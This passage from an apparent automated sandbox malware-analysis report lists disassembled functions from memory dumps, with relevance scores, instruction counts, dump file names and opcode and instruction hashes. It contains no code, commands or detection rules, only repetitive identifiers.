                                                                                                                        • Opcode ID: e053eb542aeb4a6de5b8424594cc9e7dc13aeb8df60439d1d98f254186d395c6
                                                                                                                        • Instruction ID: cc91441a4ac5fb0f536ae50464f7b05ac423edb4b51dddf5319b214b58d33094
                                                                                                                        • Opcode Fuzzy Hash: e053eb542aeb4a6de5b8424594cc9e7dc13aeb8df60439d1d98f254186d395c6
                                                                                                                        • Instruction Fuzzy Hash: EDF036736111243B5B1CEE65DC55CBBB79DEFC9160706422DFD0AAB280D924BC11D1B5
                                                                                                                        Function 008CEE60 Relevance: .8, Instructions: 758COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 36b9729e6011bb693d14114c09a259d3d14656a2ec8a88a60c13d5b14a745fea
                                                                                                                        • Instruction ID: e92fbae170a971379c62ab84b66dab62066c5fbc6efa787e96b741e070b25543
                                                                                                                        • Opcode Fuzzy Hash: 36b9729e6011bb693d14114c09a259d3d14656a2ec8a88a60c13d5b14a745fea
                                                                                                                        • Instruction Fuzzy Hash: 0682D865C28FD985E3235B3D944367BE3A0BFFB244F11EB1AEDD431811EB618285A245
                                                                                                                        Function 008FE570 Relevance: .7, Instructions: 664COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d467bede38e9b680dd76dc4d4da389bea1ad56128c7a8f89bd9b4139712275f6
                                                                                                                        • Instruction ID: a09afa3313da0f1dc7e4d1b9cca7b7b3ee7381aa5b73a3eb42f07c371e980970
                                                                                                                        • Opcode Fuzzy Hash: d467bede38e9b680dd76dc4d4da389bea1ad56128c7a8f89bd9b4139712275f6
                                                                                                                        • Instruction Fuzzy Hash: C6526E35A0475A8BCB20CF78C0806FAB7B1FF59314F14856ED9AAD7761D374A981CB82
                                                                                                                        Function 008805B0 Relevance: .5, Instructions: 524COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8b1835b512df48f07eff7e3b59ae844f4639ed2a48fa9a39f25e1817af5c3191
                                                                                                                        • Instruction ID: 77836d63f10f214c31ebbd1533192bdadf3a24147d4904642acda88339a9105e
                                                                                                                        • Opcode Fuzzy Hash: 8b1835b512df48f07eff7e3b59ae844f4639ed2a48fa9a39f25e1817af5c3191
                                                                                                                        • Instruction Fuzzy Hash: F6227675E002298BCB54EF98C880AEDBBB2FF49314F254259E855BB391D375AD09CF90
                                                                                                                        Function 00880C20 Relevance: .5, Instructions: 524COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9657eef6a3bf199a064e372e6b3e7f6c9a1d83e0b1064b35def8a0c3092a70db
                                                                                                                        • Instruction ID: a34b9be71002e46030ef8d7bbed449abba2e295e8073a30dc574f3f214146f9b
                                                                                                                        • Opcode Fuzzy Hash: 9657eef6a3bf199a064e372e6b3e7f6c9a1d83e0b1064b35def8a0c3092a70db
                                                                                                                        • Instruction Fuzzy Hash: A0228775E002298FCF14DF98C884AEDBBB6FF49314F158259E855AB380D774AD4ACB90
                                                                                                                        Function 0087E240 Relevance: .5, Instructions: 523COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0dcc2f05de94f956a186b5dee81e8839ed8399293b590fdd70407ead1d6e0131
                                                                                                                        • Instruction ID: cd7c3007f84f9f0b7be1897b3f7b85cd6a4de1f946cbb57b17a3135ced351268
                                                                                                                        • Opcode Fuzzy Hash: 0dcc2f05de94f956a186b5dee81e8839ed8399293b590fdd70407ead1d6e0131
                                                                                                                        • Instruction Fuzzy Hash: EA227C75600B458FC729CF28C490666BBF2FF99314B148AADD4AACBB95D730F909CB50
                                                                                                                        Function 00824A80 Relevance: .5, Instructions: 483COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 827088934f3638635502b295897b167137becf4157ac22665ef2cba30d5ce129
                                                                                                                        • Instruction ID: b3dc9a2bdfe7339468ce039285ddf1f3c30b7e03d5db44bd89784719de7f3a21
                                                                                                                        • Opcode Fuzzy Hash: 827088934f3638635502b295897b167137becf4157ac22665ef2cba30d5ce129
                                                                                                                        • Instruction Fuzzy Hash: D202AF711187098FC356EE1CE49022AF3E1FFC8305F198A2CD68587B64E739A9598F86
                                                                                                                        Function 05944226 Relevance: .4, Instructions: 369COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 12b9fdb787429248ef41284d09d298ac2bcb6d548313889bd0a3bf5ee4c8d134
                                                                                                                        • Instruction ID: e31d4b4b7e07a5e952f06e5043e7c4a73032306ed8c3c2506073726e38496de7
                                                                                                                        • Opcode Fuzzy Hash: 12b9fdb787429248ef41284d09d298ac2bcb6d548313889bd0a3bf5ee4c8d134
                                                                                                                        • Instruction Fuzzy Hash: FAF1E575E0060A9FCB14CFA9C580AAEBBF6FF48314F14856ED89AE7740E634A941CF54
                                                                                                                        Function 008224C0 Relevance: .4, Instructions: 362COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c33fb274095a188932260f0ea2736bc6a8e3ca316cc910230737caadc8204e01
                                                                                                                        • Instruction ID: 04726531428ba2b034ef926e04509c6a83461168cd851cc825ab884660223b36
                                                                                                                        • Opcode Fuzzy Hash: c33fb274095a188932260f0ea2736bc6a8e3ca316cc910230737caadc8204e01
                                                                                                                        • Instruction Fuzzy Hash: 3BF19121C1DFDA97D6129B3A8542166F3A0BFFA388F14EB1AFDD475412EB70B2D49240
                                                                                                                        Function 009065FA Relevance: .3, Instructions: 333COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f1e02999b76cef37940c3b48cbfd79a9d8d42bafda85478c8b14e96a79f2e315
                                                                                                                        • Instruction ID: 1e7dcc9d77a51d7bc009aa8cbfc86a66e61b4fedc038b54d0bafd9556744a431
                                                                                                                        • Opcode Fuzzy Hash: f1e02999b76cef37940c3b48cbfd79a9d8d42bafda85478c8b14e96a79f2e315
                                                                                                                        • Instruction Fuzzy Hash: F3C1D0749007068FCB28CF68C584B7ABBB9BF45318F148A1DD8A2976D1D732ED65CB50
                                                                                                                        Function 008EE260 Relevance: .3, Instructions: 314COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 20161894569b3c77f970f42f01bba3ed53f5afc01a93e708c9bb38bf2c92d180
                                                                                                                        • Instruction ID: dea822ef1684cceb4e942b74e808a2b2bb8c59ba19818fedbe19f373e7bdb2f1
                                                                                                                        • Opcode Fuzzy Hash: 20161894569b3c77f970f42f01bba3ed53f5afc01a93e708c9bb38bf2c92d180
                                                                                                                        • Instruction Fuzzy Hash: 08C18C71A00A5A8FDB14CE69C8807AEB7F2FF89354F194169D954FB381DB309D02CBA0
                                                                                                                        Function 009269DE Relevance: .3, Instructions: 294COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9a32fee53c4274dc8ef5343f60cfce8632107f56e08aee457a0a453baa59ed41
                                                                                                                        • Instruction ID: 43100ae6bf1f6cf7b3c58b340fd2b0bc7561574a452f8501b652c9aaad3523d0
                                                                                                                        • Opcode Fuzzy Hash: 9a32fee53c4274dc8ef5343f60cfce8632107f56e08aee457a0a453baa59ed41
                                                                                                                        • Instruction Fuzzy Hash: FBB1FE60E3EF554DC22396399831336F6ACAFBB2C5B52D71BFC6630E22EB2181835540
                                                                                                                        Function 008F8CC0 Relevance: .3, Instructions: 290COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: faf292173e624f6f0977d619f99acfabbb6f8840dccedd4ef8b55d8cf2804794
                                                                                                                        • Instruction ID: 9c2be967822b29c0169968f5eef55b3ec2508fa3810ec240a125f3f47599b099
                                                                                                                        • Opcode Fuzzy Hash: faf292173e624f6f0977d619f99acfabbb6f8840dccedd4ef8b55d8cf2804794
                                                                                                                        • Instruction Fuzzy Hash: 44C17DA6C29FCA85F7125B3DA843576F760BEFB254F10E70AFEE431921EB2182449245
                                                                                                                        Function 0597C3B2 Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1d17b88143ef60aa0af367b4d62b8f6f5ded5d5e0e206f5b0f12272b9d3f5b30
                                                                                                                        • Instruction ID: ea4a854342a1c81c57e6a89a3bb452045b49bdf9797703b564ef6c1755c15a6b
                                                                                                                        • Opcode Fuzzy Hash: 1d17b88143ef60aa0af367b4d62b8f6f5ded5d5e0e206f5b0f12272b9d3f5b30
                                                                                                                        • Instruction Fuzzy Hash: 47B17C71214609DFD719CF28C48AB647BE1FF45364F298659E89ACF2A1C336ED82CB44
                                                                                                                        Function 008D0850 Relevance: .2, Instructions: 248COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dec9bac0a76cd2ea6ed15bf165c61f03a2e8a1f6adcbbe65c62da893c8d2a548
                                                                                                                        • Instruction ID: 99a727d7071806101c81239e22d7800771f2ffdfe15e29851e045537b752e0b8
                                                                                                                        • Opcode Fuzzy Hash: dec9bac0a76cd2ea6ed15bf165c61f03a2e8a1f6adcbbe65c62da893c8d2a548
                                                                                                                        • Instruction Fuzzy Hash: 1AC1A865C2DFD985E3229B3E940337BE3A0BFFB254F50EB1ABDD431811EB614245A245
                                                                                                                        Function 00822E57 Relevance: .2, Instructions: 238COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 439906b00d06bde2143652cb7e8d8737425c3351f5253023aed432e1a17b41e5
                                                                                                                        • Instruction ID: d8fd6cae71916a1b9e9447b6b6c5ede5edf5ad12c26e0a590298b191ceaa9f42
                                                                                                                        • Opcode Fuzzy Hash: 439906b00d06bde2143652cb7e8d8737425c3351f5253023aed432e1a17b41e5
                                                                                                                        • Instruction Fuzzy Hash: 9AA1AB21C19FE546E70B7B396453250A230FFF3248B50CB0AFDA1B896BEB65B7D85121
                                                                                                                        Function 00822AB0 Relevance: .2, Instructions: 232COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2dd4c44225567eee2d7751b73d10631589946bc71cb5d53a591a32a9ba35f940
                                                                                                                        • Instruction ID: fe983b0a01312bd9103d9a7ad2c714ef2ef4c9d0952e0a222f9b8797c0058d5d
                                                                                                                        • Opcode Fuzzy Hash: 2dd4c44225567eee2d7751b73d10631589946bc71cb5d53a591a32a9ba35f940
                                                                                                                        • Instruction Fuzzy Hash: F2919910D08F9D93E6129F3D95411B6B3A1FFBE308F55EB0AEDD876812DB20B6D59280
                                                                                                                        Function 008DE200 Relevance: .2, Instructions: 215COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
